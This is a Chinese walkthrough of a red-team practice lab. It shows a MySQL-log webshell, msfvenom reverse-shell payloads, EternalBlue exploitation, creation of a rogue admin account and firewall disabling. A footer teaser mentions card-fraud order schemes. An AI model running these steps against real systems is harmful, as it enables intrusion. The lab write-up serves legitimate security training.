【精选】ATKCK红队评估实战靶场一 超详细过程思路

一、环境搭建

1.红日靶场下载:

靶场下载地址:
https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
提取码:n1u2

2.内外网IP搭建

Windows 7 x64Windows Server 2008Win2K3 Metasploitablekali
内网IP:192.168.52.143192.168.52.138192.168.52.141
外网IP:192.168.27.129192.168.27.128
一、Windows 7 x64

需要设置两个网络适配器:

1.NAT模式

2.桥接模式

桥接模式设置:

二、Windows Server 2008

三、Win2K3 Metasploitable

3.检测内外网的网络正常

Windows 7 x64

与外网互通正常

与内网的两台主机网络互通

Windows Server 2008

因为win 7开启了防火墙,所以是无法ping通 的

Win2K3 Metasploitable

最后在 Win7 外网服务器主机的 C 盘找到 PhpStudy 启动 Web 服务

二、web渗透

1.信息收集

御剑扫描

扫描发现开启了3306、80、110端口

访问80端口的web页面

账号密码都是弱口令root

扫描目录,发现/phpmyadmin/目录

访问/phpmyadmin/目录

然后利用root root登录

2.日志导出getshell

general_log和general_log_file简述:
mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,
以原始的状态来显示,
如果将general_log开关打开,general_log_file指定一个php文件,
则查询的操作将会全部写入到general_log_file指定的文件,
可以通过访问general_log_file指定的文件来获取webshell
show variables like 'general%';  #查看

set global general_log = "ON";  #开启ON

set global general_log_file="C:/phpStudy/www/shell.php"  #绝对路径C:/phpStudy/www

select '<?php @eval($_POST[cmd]);?>';

3.yxcms

在phpmyadmin数据库中,看到了newyxcms数据库,猜测下这个是不是有个这个目录

/yxcms/目录

有个公告信息:

 本站为YXcms的默认演示模板,YXcms是一款基于PHP+MYSQL构建的高效网站管理系统。 
 后台地址请在网址后面加上/index.php?r=admin进入。 
 后台的用户名:admin;密码:123456,请进入后修改默认密码。 

登录后台

账号:admin
密码:123456

@eval($_POST[cmd]);


#模板路径
protected/apps/default/view/default/info.php 

连接蚁剑

4.msf

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options 

Module options (payload/windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
   

msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o 64.exe
[*] Writing 7168 bytes to 64.exe...

需要先生成64.exe,然后才可以使用下面的命令生成payload

##payload 生成

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.27.128 LPORT=5555 -f exe -o r.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.103.129 LPORT=5555 -f exe -o 32.exe 

把生成的64.exe传入蚁剑中C:/盘

kali监听
msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.11.82 LPORT=5555 -f exe -o 64.exe

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

run

kali监听成功

三、内网信息收集

1.信息收集

c:\>net config workstation  #网络配置的信息

c:\>chcp 65001 #改编码信息

ipconfig /all   查看本机ip,所在域**

route print     打印路由信息**

net view        查看局域网内其他主机名**

arp -a          查看arp缓存

whoami

net start       查看开启了哪些服务

net share       查看开启了哪些共享

net share ipc$  开启ipc共享

net share c$    开启c盘共享

net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接

net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享

dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件

net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域

net user                 查看本机用户列表

net user /domain         查看域用户**

net localgroup administrators   查看本地管理员组(通常会有域用户)

net view /domain         查看有几个域**

net user 用户名 /domain   获取指定域用户的信息

net group /domain        查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)

net group 组名 /domain    查看域中某工作组

net group "domain admins" /domain  查看域管理员的名字

net group "domain computers" /domain  查看域中的其他主机名

net group "doamin controllers" /domain  查看域控制器(可能有多台)

四、内网横向渗透

1.信息收集

获得系统信息:sysinfo

进入shell,net view查看域内的其他机子:

定位域控:net group “domain controllers” /domain

OWA

定位域管:net group “domain admins” /domain

Ping域名获真实ip:
OWA.god.org对应:192.168.52.138

2.内网静态路由配置

MSF 的 autoroute模块是 MSF 框架中自带的一个路由转发功能,实现过程是 MSF 框架在已经获取的 Meterpreter Shell 的基础上添加一条去往“内网”的路由。

首先需要使用配置静态路由:

#加载MSF的autoroute模块,获取当前机器的所有网段信息
run post/multi/manage/autoroute  
#添加目标内网路由
run post/multi/manage/autoroute SUBNET=192.168.52.0 ACTION=ADD

添加失败,因为该路由已存在

3.MSF内网端口扫描

现在路由可达内网网段,可以先对内网主机进行探测。 1、先执行background 命令将当前执行的 Meterpreter 会话切换到后台(后续也可执行sessions -i 重新返回会话),然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域成员主机 192.168.52.141 开放的端口:

我这里优先扫80 445(MS17-010) 3389(MS19-0708)

background 

use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.141
set ports 80,135-139,445,3306,3389
run

发现开启了445端口

2、同样的方法,发现域控主机192.168.52.138也开启了 445 端口:

set rhosts 192.168.52.138
set ports 80,135-139,445,3306,3389
run

4.利用ms17-010进行攻击

1、对于开启了 445 端口的 Windows 服务器,借助 MSF 自带的漏洞扫描模块进行扫描:

search ms17_010                #搜索MSF集成的与ms17_010漏洞相关的模块
use auxiliary/scanner/smb/smb_ms17_010 # 加载扫描exp
set rhosts 192.168.52.141      #设置被扫描的主机IP
run                           

可以看到内网其他两台主机都是存在ms17-010漏洞的

2、尝试利用永恒之蓝漏洞拿下域控主机192.168.52.138,使用 MSF 集成的 ms17-010 漏洞 EXP:

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
set command whoami
run

成功执行,但是shell反弹失败。

可以尝试psexec。但是也可能会不能成功。

use exploit/windows/smb/ms17_010_psexec
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

5.MSF开启远程桌面

sessions -l

sessions -l 通常用于列出当前与远程系统建立的会话(sessions)。
这种命令通常是在Metasploit Framework(MSF)等工具中使用的

已经在 MSF 中获得 Win7 的 Shell,故只需要返回会话并执行命令

run post/windows/manage/enable_rdp

是 Metasploit Framework(MSF)中的一个后渗透模块命令。
这个特定的模块旨在用于管理 Windows 系统的后渗透,并用于在被攻陷的 Windows 机器上启用远程桌面协议(RDP)。

6.win7开启3389

先回到win7界面

获得服务器 Shell 后开启远程桌面的方法,除了借助 MSF,在常规渗透过程也可以在 CMD 命令中实现:

#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 添加账户密码
net user wsm Pass!@123456 /add
# 给账户添加为管理员权限
net localgroup administrators Tr0e /add
#查询是否成功添加用户
net user wsm
#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

7.域控主机141开启远程桌面连接

#msf 设置全局代理

setg Proxies socks5:127.0.0.1:8989

setg ReverseAllowProxy true


##通过代理连接远程桌面

proxychains rdesktop 192.168.52.141 -p hongrisec@2022 -u administrator

8.拿下域管主机138

同理再拿下域管主机
注意!域管主机连不上的话需要关闭防火墙!!!

##关闭防火墙:

netsh firewall set opmode disable

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/203348.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

搜维尔科技:Varjo XR-4 系列-专为极致沉浸感而打造!

Varjo 的新一代头显将世界上最先进的混合现实技术与顶尖的图形处理能力连接起来&#xff0c;满足最高级别的视觉保真度和沉浸感至关重要的工业用例。 光学设计的根本性突破 体验全新的沉浸感。大幅扩展的视野&#xff0c;跨越 120 x 105 度&#xff0c;打破了受人尊敬的“全双眼…

mybatis数据输入-零散的简单类型数据

1、建库建表 CREATE DATABASE mybatis-example;USE mybatis-example;CREATE TABLE t_emp(emp_id INT AUTO_INCREMENT,emp_name CHAR(100),emp_salary DOUBLE(10,5),PRIMARY KEY(emp_id) );INSERT INTO t_emp(emp_name,emp_salary) VALUES("tom",200.33); INSERT INTO…

电子学会 2023年9月 青少年软件编程Python编程等级考试二级真题解析(选择题+判断题+编程题)

青少年编程Python编程等级考试二级真题解析(选择题+判断题+编程题) 2023年9月 一、选择题(共25题,共50分) 以下代码运行结果是?( ) A. 宸宸 B. 杭杭 C. 玉玉 D. 州州 答案选:A 考点分析:考察python 列表操作 jxw=yyh[2][0],jxw的值是“拱宸桥”,jxw[1]的值是“宸”…

a-table:表格组件常用功能记录——基础积累2

antdvue是我目前项目的主流&#xff0c;在工作过程中&#xff0c;经常用到table组件。下面就记录一下工作中经常用到的部分知识点。 a-table&#xff1a;表格组件常用功能记录——基础积累2 效果图1.table 点击行触发点击事件1.1 实现单选 点击事件1.2 实现多选 点击事件1.3 实…

后端Long型数据传到前端js后精度丢失的问题

假设一个场景&#xff0c;MybatisPlus的雪花算法生成long类型主键ID&#xff0c;存入数据库&#xff0c;前端获取到数据后&#xff0c;要执行一个更新操作&#xff08;updateById&#xff09;&#xff0c;但这时会出现无法成功更新的情况&#xff01;这是因为前端在长度大于17位…

PyBullet安装与学习

PyBullet 支持加载 URDF、SDF、MJCF 等多种机器人描述文件&#xff0c;并提供正/逆向运动学、正/逆向动力学、碰撞检测、射线相交查询等功能。 pip install pybullet 安装后会在 Python 环境的 lib/site-packages 中出现以下文件夹&#xff1a; pybullet_data&#xff1a;存放…

HarmonyOS4.0开发应用(二)【快速学习】

快速学习 创建项目 1.开始创建 2.选择模板 刚开始选择空白的模板即可 3.填写项目信息 这样一个基本项目就创建好了 代码结构 实现Demo(文字动态切换) Entry Component struct Index {State message: string Hello Worldbuild() {Row() {Column() {Text(this.message).fo…

使用Java将properties转为yaml,保证顺序、实测无BUG版本

使用Java将properties转为yaml 一 前言1.1 顺序错乱的原因1.2 遗漏子节点的原因 二、优化措施三、源码 一 前言 浏览了一圈网上的版本&#xff0c;大多存在以下问题&#xff1a; 转换后顺序错乱遗漏子节点 基于此进行了优化&#xff0c;如果只是想直接转换&#xff0c;可直接…

pandas(八)--实战一下

背景 收到一批数据&#xff0c;数据形式。采集数据的间隔时间是10分钟&#xff0c;全天采集数据&#xff0c;每天的数据量是144条 处理后的数据形式 分析 去除表格中的q的异常值&#xff0c;置为0去除重复行将原始表格中的date分裂成日期和时间缺失的时间点数据补0&#x…

Target、沃尔玛撸卡、采退支付下单如何避免账号关联风险?

近年来&#xff0c;随着跨境电商平台的日益繁荣&#xff0c;越来越多的国内卖家涌入其中&#xff0c;导致竞争异常激烈。为了在竞争中脱颖而出&#xff0c;一些卖家采用自动脚本程序进行浏览和下单&#xff0c;然而这种行为很容易导致账号被批量关联、封号。本文将探讨养号下单…

JOSEF 时间继电器 DS-37 AC220V 10秒 柜内安装,板前接线

系列型号 DS-31时间继电器&#xff1b;DS-31/X时间继电器&#xff1b; DS-31/2X时间继电器&#xff1b;DS-32时间继电器&#xff1b; DS-32/X时间继电器;DS-32/2X时间继电器; DS-33时间继电器;DS-33/X时间继电器; DS-33/2X时间继电器;DS-34时间继电器; DS-31C/X时间继电器…

聊一聊大模型 | 京东云技术团队

事情还得从ChatGPT说起。 2022年12月OpenAI发布了自然语言生成模型ChatGPT&#xff0c;一个可以基于用户输入文本自动生成回答的人工智能体。它有着赶超人类的自然对话程度以及逆天的学识。一时间引爆了整个人工智能界&#xff0c;各大巨头也纷纷跟进发布了自家的大模型&#…

MySQL进阶知识:三

前言 未更新完毕&#xff01;大概明天更完&#xff01; 锁 MySQL中的锁&#xff0c;按照锁的粒度分&#xff0c;分为以下三类 全局锁&#xff1a;锁定数据库中的所有表。表级锁&#xff1a;每次操作锁住整张表。行级锁&#xff1a;每次操作锁住对应的行数据。 全局锁 全局…

14.docker部署应用的两种企业实践

1.介绍 1.1 说明 这里仅仅说明一下在企业应用的两种简单实践&#xff0c;并不包含自动化这套东西。这里说的两种实践&#xff0c;是我在工作中不同公司使用的两种部署方式&#xff0c;仅供大家参考。 1.2 两种部署方式 第一种&#xff1a;是把环境和app都一起打成一个镜像&…

TCP 连接断开

1&#xff1a;TCP 四次挥手过程是怎样的&#xff1f; 客户端打算关闭连接&#xff0c;此时会发送一个 TCP 首部 FIN 标志位被置为 1 的报文&#xff0c;也即 FIN 报文&#xff0c;之后客户端进入 FIN_WAIT_1 状态。 服务端收到该报文后&#xff0c;就向客户端发送 ACK 应答报文…

【开源】基于Vue.js的超市账单管理系统的设计和实现

项目编号&#xff1a; S 032 &#xff0c;文末获取源码。 \color{red}{项目编号&#xff1a;S032&#xff0c;文末获取源码。} 项目编号&#xff1a;S032&#xff0c;文末获取源码。 目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块三、系统设计3.1 总体设计3.2 前端设计3…

mybatis数据输入-实体类型的参数

1、建库建表 CREATE DATABASE mybatis-example;USE mybatis-example;CREATE TABLE t_emp(emp_id INT AUTO_INCREMENT,emp_name CHAR(100),emp_salary DOUBLE(10,5),PRIMARY KEY(emp_id) );INSERT INTO t_emp(emp_name,emp_salary) VALUES("tom",200.33); INSERT INTO…

Python文件操作,看这篇就足够!

Python中有几个内置模块和方法来处理文件。这些方法被分割到例如os, os.path , shutil 和 pathlib 等等几个模块中。文章将列举Python中对文件最常用的操作和方法。 在这篇文章中&#xff0c;你将学习如何&#xff1a; 获取文件属性创建目录文件名模式匹配遍历目录树创建临时…

python实现获取aws route53域名信息

最近由于工作原因接触到aws的服务&#xff0c;我需要实时获取所有的域名信息&#xff0c;用于对其进行扫描&#xff0c;因此写了一个自动化爬取脚本 给需要的人分享。 1.基础准备 代码环境&#xff1a;python3 第三方库&#xff1a;boto3 &#xff08;安装方法pip install…

【web安全】CSRF漏洞攻击与防御

前言 总结&#xff0c;仅供学习。 csrf的理解 我们了解一个网站有修改信息&#xff0c;密码&#xff0c;添加删除管理&#xff0c;支付转账的功能之后。 通过抓包抓取对方修改操作的数据包样式&#xff0c; 然后在自己网站搭建一个指令。 当别人来访时&#xff0c; 如果…